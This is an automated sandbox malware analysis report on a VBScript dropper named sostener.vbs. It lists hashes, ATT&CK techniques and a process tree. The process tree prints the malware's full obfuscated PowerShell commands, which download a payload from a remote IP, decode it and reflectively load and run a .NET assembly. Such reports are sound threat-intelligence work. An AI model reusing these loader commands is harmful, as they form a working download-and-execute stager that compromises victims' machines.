Overview

overview

10

Static

static

1

sostener.vbs

windows7-x64

10

sostener.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 08:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sostener.vbs

  • Size

    3.3MB

  • MD5

    619077e3c8387532a2d930e2b86c9ff7

  • SHA1

    081166adc2aed980d757c61687838f53ecaf4224

  • SHA256

    3c313c19ce509197f848990ef3837d2fdf55ed5d9eb2ddf2f1cd9f35e41bd664

  • SHA512

    cce42eacddd12c0a541eacb5a772b5a2b70844154c31264b82a846cda4db488d8142e3cb09caada11a16eceae16884577f439892b2c4465d04df9fffbcff3323

  • SSDEEP

    768:iooooLooooLooooLoooorooooLooooLooooLoooocooooLooooLooooLoooorooi:zDnM

Score
10/10
defense_evasiondiscoveryexecution

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹Og☹v☹C8☹OQ☹x☹C4☹Mg☹w☹DI☹Lg☹y☹DM☹Mw☹u☹DE☹Ng☹5☹C8☹V☹Bh☹Gs☹LwBS☹GU☹Zw☹v☹E0☹YQBy☹Ho☹LwBE☹FI☹Rw☹v☹FI☹V☹BD☹C8☹QQBE☹C8☹Z☹Bs☹Gw☹LgB0☹Hg☹d☹☹n☹C☹☹Ow☹k☹EM☹WQBy☹Eo☹U☹☹g☹D0☹I☹☹o☹C☹☹WwBT☹Hk☹cwB0☹GU☹bQ☹u☹Ek☹Tw☹u☹F☹☹YQB0☹Gg☹XQ☹6☹Do☹RwBl☹HQ☹V☹Bl☹G0☹c☹BQ☹GE☹d☹Bo☹Cg☹KQ☹g☹Cs☹I☹☹n☹GQ☹b☹Bs☹D☹☹MQ☹u☹HQ☹e☹B0☹Cc☹I☹☹p☹C☹☹OwBJ☹G4☹dgBv☹Gs☹ZQ☹t☹Fc☹ZQBi☹FI☹ZQBx☹HU☹ZQBz☹HQ☹I☹☹t☹FU☹UgBJ☹C☹☹J☹BD☹EM☹UgBo☹G0☹I☹☹t☹E8☹dQB0☹EY☹aQBs☹GU☹I☹☹k☹EM☹WQBy☹Eo☹U☹☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹I☹Bw☹G8☹dwBl☹HI☹cwBo☹GU☹b☹Bs☹C4☹ZQB4☹GU☹I☹☹t☹GM☹bwBt☹G0☹YQBu☹GQ☹I☹B7☹C☹☹J☹BD☹Fk☹cgBK☹F☹☹I☹☹9☹C☹☹K☹☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹C☹☹KQ☹g☹Ds☹J☹Bn☹Ec☹aQBt☹EE☹I☹☹9☹C☹☹K☹☹g☹Ec☹ZQB0☹C0☹QwBv☹G4☹d☹Bl☹G4☹d☹☹g☹C0☹U☹Bh☹HQ☹a☹☹g☹CQ☹QwBZ☹HI☹SgBQ☹C☹☹KQ☹g☹Ds☹I☹B9☹C☹☹Ow☹k☹Hg☹awBs☹Gw☹a☹☹g☹D0☹I☹☹n☹D☹☹Jw☹g☹Ds☹J☹Bi☹H☹☹dgBy☹HY☹I☹☹9☹C☹☹Jw☹l☹Eo☹awBR☹GE☹cwBE☹GY☹ZwBy☹FQ☹Zw☹l☹Cc☹I☹☹7☹Fs☹QgB5☹HQ☹ZQBb☹F0☹XQ☹g☹CQ☹bQBx☹G8☹bgBz☹C☹☹PQ☹g☹Fs☹cwB5☹HM☹d☹Bl☹G0☹LgBD☹G8☹bgB2☹GU☹cgB0☹F0☹Og☹6☹EY☹cgBv☹G0☹QgBh☹HM☹ZQ☹2☹DQ☹UwB0☹HI☹aQBu☹Gc☹K☹☹g☹Cg☹I☹BH☹GU☹d☹☹t☹EM☹bwBu☹HQ☹ZQBu☹HQ☹I☹☹t☹F☹☹YQB0☹Gg☹I☹☹k☹EM☹WQBy☹Eo☹U☹☹g☹Ck☹LgBy☹GU☹c☹Bs☹GE☹YwBl☹Cg☹Jw☹k☹CQ☹Jw☹s☹Cc☹QQ☹n☹Ck☹I☹☹p☹C☹☹OwBb☹FM☹eQBz☹HQ☹ZQBt☹C4☹QQBw☹H☹☹R☹Bv☹G0☹YQBp☹G4☹XQ☹6☹Do☹QwB1☹HI☹cgBl☹G4☹d☹BE☹G8☹bQBh☹Gk☹bg☹u☹Ew☹bwBh☹GQ☹K☹☹k☹G0☹cQBv☹G4☹cw☹p☹C4☹RwBl☹HQ☹V☹B5☹H☹☹ZQ☹o☹Cc☹V☹Bl☹Gg☹dQBs☹GM☹a☹Bl☹HM☹W☹B4☹Fg☹e☹B4☹C4☹QwBs☹GE☹cwBz☹DE☹Jw☹p☹C4☹RwBl☹HQ☹TQBl☹HQ☹a☹Bv☹GQ☹K☹☹n☹E0☹cwBx☹EI☹SQBi☹Fk☹Jw☹p☹C4☹SQBu☹HY☹bwBr☹GU☹K☹☹k☹G4☹dQBs☹Gw☹L☹☹g☹Fs☹bwBi☹Go☹ZQBj☹HQ☹WwBd☹F0☹I☹☹o☹C☹☹JwBk☹EE☹Qg☹0☹EE☹S☹BR☹EE☹T☹Bn☹EI☹MgBB☹Ec☹O☹BB☹GI☹ZwBB☹DU☹QQBE☹EU☹QQBj☹Hc☹QgB2☹EE☹S☹BN☹EE☹T☹B3☹EI☹egBB☹Ec☹UQBB☹Fk☹UQBC☹HY☹QQBH☹Hc☹QQBi☹Gc☹Qg☹z☹EE☹Rw☹4☹EE☹WgBB☹EE☹dgBB☹EQ☹awBB☹E0☹UQBC☹Gw☹QQBI☹Ek☹QQBZ☹Gc☹QgB0☹EE☹RwBV☹EE☹YQBR☹EI☹MgBB☹Ec☹O☹BB☹GI☹ZwBB☹HY☹QQBD☹D☹☹QQBM☹FE☹QQ☹y☹EE☹R☹Bj☹EE☹TgBR☹EE☹M☹BB☹Eg☹SQBB☹GI☹dwBC☹D☹☹QQBH☹E0☹QQBa☹FE☹QgBv☹EE☹Qw☹4☹EE☹WgB3☹EI☹eQBB☹Ec☹O☹BB☹Ew☹ZwBC☹D☹☹QQBH☹FU☹QQBh☹Hc☹QgBq☹EE☹S☹BV☹EE☹WQBn☹EI☹M☹BB☹Ec☹awBB☹Fk☹ZwBB☹HY☹QQBD☹Dg☹QQBP☹Gc☹QgB6☹EE☹S☹BB☹EE☹Z☹BB☹EI☹M☹BB☹Ec☹ZwBB☹Cc☹I☹☹s☹C☹☹J☹Bi☹H☹☹dgBy☹HY☹I☹☹s☹C☹☹JwBf☹F8☹XwBf☹F8☹cwBj☹HM☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹LQ☹t☹C0☹LQ☹t☹C0☹LQ☹n☹Cw☹I☹☹k☹Hg☹awBs☹Gw☹a☹☹s☹C☹☹Jw☹x☹Cc☹L☹☹g☹Cc☹UgBv☹GQ☹YQ☹n☹C☹☹KQ☹p☹C☹☹Ow☹=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs');powershell $Yolopolhggobek;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2464
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1872
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c
          4⤵
            PID:2788
          • C:\Windows\system32\PING.EXE
            "C:\Windows\system32\PING.EXE" 127.0.0.1
            4⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2716
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2740

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      dd1cd9c35732df582338db37b144e5d7

      SHA1

      9e9fe34fd4a30d0ff6d1568e732e0caabb1a6e67

      SHA256

      6f74bce92859a0692240747e09c30e3bb6c8caf9daa607b5c07aafe79000ac57

      SHA512

      e7923e1d2586c831847219f5fc51a0cefb39f7f52a5b84e59f5c5e315f274fff6d294c2dd885a96ee8ab26825fb8584bb51956948170acc6bb06e84ad9a2f612

      Download Submit

    • memory/2464-4-0x000007FEF596E000-0x000007FEF596F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2464-5-0x000000001B770000-0x000000001BA52000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2464-6-0x0000000002040000-0x0000000002048000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2464-7-0x000007FEF56B0000-0x000007FEF604D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2464-13-0x000007FEF56B0000-0x000007FEF604D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2464-19-0x000007FEF56B0000-0x000007FEF604D000-memory.dmp

      Filesize

      9.6MB

      Download